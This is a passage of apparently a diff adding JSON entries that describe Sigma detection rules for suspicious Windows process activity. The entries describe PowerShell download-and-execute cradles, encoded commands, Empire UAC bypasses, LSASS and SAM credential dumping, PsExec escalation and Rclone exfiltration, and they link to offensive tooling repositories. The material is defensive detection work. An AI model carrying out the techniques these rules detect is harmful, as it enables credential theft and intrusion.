"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_cmd_patterns.yml" + ], + "tags": [ + "attack.execution", + 
"attack.t1059.001" + ], + "creation_date": "2022/05/24", + "filename": "proc_creation_win_susp_powershell_cmd_patterns.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Other tools that work with encoded scripts in the command line instead of script files" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious ways to download files or content using PowerShell", + "uuid": "6e897651-f157-4d8f-aaeb-df8151488385", + "value": "PowerShell Web Download", + "meta": { + "refs": [ + "https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_download_cradles.yml" + ], + "tags": "No established tags", + "creation_date": "2022/03/24", + "filename": "proc_creation_win_susp_powershell_download_cradles.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Scripts or tools that download files" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious ways to download files or content and execute them using PowerShell", + "uuid": "85b0b087-eddf-4a2b-b033-d771fa2b9775", + "value": "PowerShell Web Download and Execution", + "meta": { + "refs": [ + "https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_download_iex.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/03/24", + "filename": "proc_creation_win_susp_powershell_download_iex.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Scripts or tools that download files and execute them" + ], + 
"logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious powershell command line parameters used in Empire", + "uuid": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", + "value": "Empire PowerShell Launch Parameters", + "meta": { + "refs": [ + "https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_launch.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/04/20", + "filename": "proc_creation_win_susp_powershell_empire_launch.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Other tools that incidentally use the same command line parameters" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects some Empire PowerShell UAC bypass methods", + "uuid": "3268b746-88d8-4cd3-bffc-30077d02c787", + "value": "Empire PowerShell UAC Bypass", + "meta": { + "refs": [ + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_uac_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" + ], + "creation_date": "2019/08/30", + "filename": "proc_creation_win_susp_powershell_empire_uac_bypass.yml", + "author": "Ecco", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Commandline to launch powershell with a base64 payload", + "uuid": "fb843269-508c-4b76-8b8d-88679db22ce7", + "value": "Suspicious Execution of Powershell with Base64", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets", + "https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/", + "https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_encode.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2022/01/02", + "filename": "proc_creation_win_susp_powershell_encode.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious encoded character syntax often used for defense evasion", + "uuid": "e312efd0-35a1-407f-8439-b8d434b438a6", + "value": "PowerShell Encoded Character Syntax", + "meta": { + "refs": [ + "https://twitter.com/0gtweet/status/1281103918693482496", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_encoded_param.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ], + "creation_date": "2020/07/09", + "filename": "proc_creation_win_susp_powershell_encoded_param.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)", + "uuid": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", + "value": "Suspicious Encoded PowerShell Command Line", + "meta": { + "refs": [ + "https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_enc_cmd.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2018/09/03", + "filename": "proc_creation_win_susp_powershell_enc_cmd.yml", + "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", + "level": "high", + "falsepositive": "No established falsepositives", + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", + "uuid": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", + "value": "PowerShell Get-Process LSASS", + "meta": { + "refs": [ + "https://twitter.com/PythonResponder/status/1385064506049630211", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_getprocess_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.004" + ], + "creation_date": "2021/04/23", + "filename": 
"proc_creation_win_susp_powershell_getprocess_lsass.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", + "uuid": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", + "value": "Malicious Base64 Encoded PowerShell Keywords in Command Lines", + "meta": { + "refs": [ + "http://www.leeholmes.com/blog/2017/09/21/searching-for-content-in-base-64-strings/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_hidden_b64_cmd.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_susp_powershell_hidden_b64_cmd.yml", + "author": "John Lambert (rule)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious ways to run Invoke-Execution using IEX acronym", + "uuid": "09576804-7a05-458e-a817-eb718ca91f54", + "value": "Suspicious PowerShell IEX Execution Patterns", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_iex_patterns.yml" + ], + "tags": "No established tags", + "creation_date": "2022/03/24", + "filename": "proc_creation_win_susp_powershell_iex_patterns.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate scripts that use IEX" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious powershell invocations from interpreters or unusual programs", + "uuid": 
"95eadcb2-92e4-4ed1-9031-92547773a6db", + "value": "Suspicious PowerShell Invocation Based on Parent Process", + "meta": { + "refs": [ + "https://www.carbonblack.com/2017/03/15/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_parent_combo.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_susp_powershell_parent_combo.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Microsoft Operations Manager (MOM)", + "Other scripts" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious parents of powershell.exe", + "uuid": "754ed792-634f-40ae-b3bc-e0448d33f695", + "value": "Suspicious PowerShell Parent Process", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=26", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_parent_process.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/03/20", + "filename": "proc_creation_win_susp_powershell_parent_process.yml", + "author": "Teymur Kheirkhabarov, Harish Segar (rule)", + "level": "high", + "falsepositive": [ + "Other scripts" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious PowerShell scripts accessing SAM hives", + "uuid": "1af57a4b-460a-4738-9034-db68b880c665", + "value": "PowerShell SAM Copy", + "meta": { + "refs": [ + "https://twitter.com/splinter_code/status/1420546784250769408", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_sam_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + 
], + "creation_date": "2021/07/29", + "filename": "proc_creation_win_susp_powershell_sam_access.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Some rare backup scenarios", + "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious sub processes spawned by PowerShell", + "uuid": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", + "value": "Suspicious PowerShell Sub Processes", + "meta": { + "refs": [ + "https://twitter.com/ankit_anubhav/status/1518835408502620162", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_sub_processes.yml" + ], + "tags": "No established tags", + "creation_date": "2022/04/26", + "filename": "proc_creation_win_susp_powershell_sub_processes.yml", + "author": "Florian Roth, Tim Shelton", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. 
nEt.WEbCliEnT) string as used in obfuscation techniques", + "uuid": "c86133ad-4725-4bd0-8170-210788e0a7ba", + "value": "Net WebClient Casing Anomalies", + "meta": { + "refs": [ + "https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_webclient_casing.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2022/05/24", + "filename": "proc_creation_win_susp_powershell_webclient_casing.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a certain command line flag combination used by Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", + "uuid": "a20391f8-76fb-437b-abc0-dba2df1952c6", + "value": "NodejsTools PressAnyKey Lolbin", + "meta": { + "refs": [ + "https://twitter.com/mrd0x/status/1463526834918854661", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pressynkey_lolbin.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/01/11", + "filename": "proc_creation_win_susp_pressynkey_lolbin.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Other tools with the same command line flag combination", + "Legitimate uses as part of Visual Studio development" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Attackers can use print.exe for remote file copy", + "uuid": "bafac3d6-7de9-4dd9-8874-4a1194b493ed", + "value": "Abusing Print Executable", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Print/", + "https://twitter.com/Oddvarmoe/status/985518877076541440", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_print.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2020/10/05", + "filename": "proc_creation_win_susp_print.yml", + "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", + "uuid": "5afee48e-67dd-4e03-a783-f74259dcf998", + "value": "Suspicious Use of Procdump on LSASS", + "meta": { + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_procdump_lsass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.credential_access", + "attack.t1003.001", + "car.2013-05-009" + ], + "creation_date": "2018/10/30", + "filename": "proc_creation_win_susp_procdump_lsass.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely, because no one should dump an lsass process memory", + "Another tool that uses the command line switches of Procdump" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", + "uuid": "811e0002-b13b-4a15-9d00-a613fce66e42", + "value": "Process Hacker / System Informer Usage", + "meta": { + "refs": [ + "https://processhacker.sourceforge.io/", + "https://github.com/winsiderss/systeminformer", + 
"https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_process_hacker.yml" + ], + "tags": "No established tags", + "creation_date": "2022/10/10", + "filename": "proc_creation_win_susp_process_hacker.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Sometimes used by developers or system administrators for debugging purposes" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", + "uuid": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", + "value": "Suspicious Program Names", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_progname.yml" + ], + "tags": "No established tags", + "creation_date": "2022/02/11", + "filename": "proc_creation_win_susp_progname.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate tools that accidentally match on the searched patterns" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects user accept agreement execution in psexec commandline", + "uuid": "730fc21b-eaff-474b-ad23-90fd265d4988", + "value": "Psexec Accepteula Condition", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexec_eula.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569", + "attack.t1021" + ], + "creation_date": "2020/10/30", + "filename": 
"proc_creation_win_susp_psexec_eula.yml", + "author": "omkar72", + "level": "medium", + "falsepositive": [ + "Administrative scripts." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution", + "uuid": "fdfcbd78-48f1-4a4b-90ac-d82241e368c5", + "value": "PsExec Service Execution", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", + "https://www.youtube.com/watch?v=ro2QuZTIMBM", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/07/21", + "filename": "proc_creation_win_susp_psexesvc.yml", + "author": "Romaissa Adjailia, FLorian Roth", + "level": "medium", + "falsepositive": [ + "Legitimate administrative tasks" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. 
the administrator account)", + "uuid": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", + "value": "PsExec Service Execution as LOCAL SYSTEM", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/07/21", + "filename": "proc_creation_win_susp_psexesvc_as_system.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate administrative tasks" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", + "uuid": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", + "value": "Renamed PsExec Service Execution", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", + "https://www.youtube.com/watch?v=ro2QuZTIMBM", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc_renamed.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/07/21", + "filename": "proc_creation_win_susp_psexesvc_renamed.yml", + "author": "FLorian Roth", + "level": "high", + "falsepositive": [ + "Legitimate administrative tasks" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", + "uuid": "8834e2f7-6b4b-4f09-8906-d2276470ee23", + "value": "PsExec/PAExec Escalation to LOCAL SYSTEM", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", + "https://www.poweradmin.com/paexec/", + 
"https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_escalate_system.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587.001" + ], + "creation_date": "2021/11/23", + "filename": "proc_creation_win_susp_psexex_paexec_escalate_system.yml", + "author": "Florian Roth, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious flags used by PsExec and PAExec but no usual program name in command line", + "uuid": "207b0396-3689-42d9-8399-4222658efc99", + "value": "PsExec/PAExec Flags", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", + "https://www.poweradmin.com/paexec/", + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_flags.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587.001" + ], + "creation_date": "2021/05/22", + "filename": "proc_creation_win_susp_psexex_paexec_flags.yml", + "author": "Florian Roth, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Weird admins that rename their tools", + "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Threat actors can use the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery.", + "uuid": 
"aae1243f-d8af-40d8-ab20-33fc6d0c55bc", + "value": "Suspicious Use of PsLogList", + "meta": { + "refs": [ + "https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/", + "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos", + "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psloglist.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002" + ], + "creation_date": "2021/12/18", + "filename": "proc_creation_win_susp_psloglist.yml", + "author": "Nasreddine Bencherchali @nas_bench", + "level": "medium", + "falsepositive": [ + "Another tool that uses the command line switches of PsLogList", + "Legitimate use of PsLogList by an administrator" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "The psr.exe captures desktop screenshots and saves them on the local machine", + "uuid": "2158f96f-43c2-43cb-952a-ab4580f32382", + "value": "Psr.exe Capture Screenshots", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Psr/", + "https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psr_capture_screenshots.yml" + ], + "tags": [ + "attack.collection", + "attack.t1113" + ], + "creation_date": "2019/10/12", + "filename": "proc_creation_win_susp_psr_capture_screenshots.yml", + "author": "Beyu Denis, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a 
suspicious command line execution that invokes PowerShell with reference to an AppData folder", + "uuid": "ac175779-025a-4f12-98b0-acdaeb77ea85", + "value": "PowerShell Script Run in AppData", + "meta": { + "refs": [ + "https://twitter.com/JohnLaTwC/status/1082851155481288706", + "https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ps_appdata.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/01/09", + "filename": "proc_creation_win_susp_ps_appdata.yml", + "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", + "level": "medium", + "falsepositive": [ + "Administrative scripts" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", + "uuid": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", + "value": "PowerShell DownloadFile", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ps_downloadfile.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1104", + "attack.t1105" + ], + "creation_date": "2020/08/28", + "filename": "proc_creation_win_susp_ps_downloadfile.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", + "uuid": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", + "value": "Suspicious PowerShell Obfuscated PowerShell Code", + 
"meta": { + "refs": [ + "https://app.any.run/tasks/fcadca91-3580-4ede-aff4-4d2bf809bf99/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ps_encoded_obfusc.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/07/11", + "filename": "proc_creation_win_susp_ps_encoded_obfusc.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "An adversary may use Radmin Viewer Utility to remotely control Windows device", + "uuid": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", + "value": "Use Radmin Viewer Utility", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1072/T1072.md", + "https://www.radmin.fr/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_radmin.yml" + ], + "tags": [ + "attack.execution", + "attack.lateral_movement", + "attack.t1072" + ], + "creation_date": "2022/01/22", + "filename": "proc_creation_win_susp_radmin.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. 
This is pretty indicative of malicious actions.", + "uuid": "faa48cae-6b25-4f00-a094-08947fef582f", + "value": "Rar Usage with Password and Compression Level", + "meta": { + "refs": [ + "https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/", + "https://ss64.com/bash/rar.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rar_flags.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ], + "creation_date": "2020/05/12", + "filename": "proc_creation_win_susp_rar_flags.yml", + "author": "@ROxPinTeddy", + "level": "high", + "falsepositive": [ + "Legitimate use of Winrar command line version", + "Other command line tools, that use these flags" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious process related to rasdial.exe", + "uuid": "6bba49bf-7f8c-47d6-a1bb-6b4dece4640e", + "value": "Suspicious RASdial Activity", + "meta": { + "refs": [ + "https://twitter.com/subTee/status/891298217907830785", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rasdial_activity.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1059" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_susp_rasdial_activity.yml", + "author": "juju4", + "level": "medium", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to 
escalate privileges to LOCAL SYSTEM", + "uuid": "a4eaf250-7dc1-4842-862a-5e71cd59a167", + "value": "Suspicious RazerInstaller Explorer Subprocess", + "meta": { + "refs": [ + "https://twitter.com/j0nh4t/status/1429049506021138437", + "https://streamable.com/q2dsji", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_razorinstaller_explorer.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1553" + ], + "creation_date": "2021/08/23", + "filename": "proc_creation_win_susp_razorinstaller_explorer.yml", + "author": "Florian Roth, Maxime Thiebaut", + "level": "high", + "falsepositive": [ + "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", + "uuid": "e37db05d-d1f9-49c8-b464-cee1a4b11638", + "value": "Rclone Execution via Command Line or PowerShell", + "meta": { + "refs": [ + "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a", + "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone", + "https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rclone_execution.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ], + "creation_date": "2021/05/10", + "filename": "proc_creation_win_susp_rclone_execution.yml", + 